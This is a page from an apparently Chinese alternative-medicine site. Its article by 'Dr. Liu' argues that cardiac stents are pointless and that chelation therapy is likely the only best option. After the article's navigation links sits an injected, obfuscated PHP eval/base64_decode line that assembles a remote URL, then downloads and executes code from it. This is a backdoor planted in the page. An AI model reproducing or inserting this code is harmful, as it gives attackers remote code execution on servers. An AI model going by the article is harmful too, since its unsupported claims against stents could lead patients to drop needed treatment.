收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 一根支架撐不起一個身體
一根支架撐不起一個身體 列印 E-mail
        一根支架,只能撐開一點五公分的血管,試問我們全身幾千英里長的血管,難道只有這一點五公分硬化嗎?

如果有這一點五公分的硬化,表示身體內一定有其他部份的血管呈也有不同程度的硬化;所以治療這一小段的硬化,只是在等待其他部分血管繼續硬化與阻塞,完全沒有預防醫學的意義,只是永遠的「頭痛醫頭,腳痛醫腳」、「塞哪裡,通哪裏」。

預防醫學需要改善所有的血管硬化,絕不只是改善一小段血管的硬化而已,此時或許「螯合療法」將會是唯一最佳的選擇,畢竟這是我用生命體驗出來的結果。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));